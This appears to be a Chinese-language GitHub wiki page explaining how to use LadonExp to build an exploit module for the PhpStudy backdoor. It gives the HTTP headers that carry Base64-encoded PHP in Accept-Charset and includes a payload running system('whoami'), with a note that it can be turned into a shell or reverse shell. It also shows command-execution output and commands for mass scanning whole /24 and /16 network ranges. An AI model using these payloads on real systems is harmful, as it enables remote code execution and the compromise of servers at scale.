-
Notifications
You must be signed in to change notification settings - Fork 862
LadonExp Usage
Ladon Web Exp生成器包含4种提交方法Get/Post/Put/Move,支持16个Http协议参数。
用户无需编程能力,填写HTTP参数即可生成Web漏洞POC,快速扩展Ladon扫描能力。
运行环境:.net 3.5(Win7自带)
将生成器和Ladon.exe放在同一目录
该后门利用比较简单,仅需提交两个参数
Accept-Encoding: gzip,deflate
Accept-Charset: Base64编码(PHP代码)
https://github.com/k8gege/PhpStudyDoor
打印字符串
echo "ISDoorOK";
K8飞刀Base64编码得到 ZWNobyAiSVNEb29yT0siOw==
如包含 ISDoorOK ,返回PhpStudyDoor
配置
Accept-Encoding: gzip,deflate
Accept-Charset: ZWNobyAiSVNEb29yT0siOw==
PocTag: ISDoorOK
PocName: PhpStudyDoor
编译测试
Ladon 5.5
By K8gege
load netscan.dll
http://192.168.1.26 PhpStudyDoor
Finished!
执行whoami命令(可根据需要改成GetShell或反弹)
echo 'start';system('whoami');echo 'end';
配置
Accept-Encoding: gzip,deflate
Accept-Charset: ZWNobyAnc3RhcnQnO3N5c3RlbSgnd2hvYW1pJyk7ZWNobyAnZW5kJzs=
编译测试
Ladon 5.5
By K8gege
load netscan.dll
startwin-4udh62v7dmn\null
endHello World
Finished!
Result勾选替换换行为空格
正则: (?<=start).*?(?=end)
为了不被后续Exp覆盖,可将netscan.dll改名为PhpStudyExp.dll
单个IP检测 Ladon 192.168.1.8 PhpStudyExp.dll
单个URL检测 Ladon http://192.168.1.8 PhpStudyExp.dll
批量C段检测 Ladon 192.168.1.8/24 PhpStudyExp.dll
批量B段检测 Ladon 192.168.1.8/16 PhpStudyExp.dll
批量url.txt检测 Ladon PhpStudyExp.dll
执行结果返回机器IP以及利用结果(执行whoami当前用户)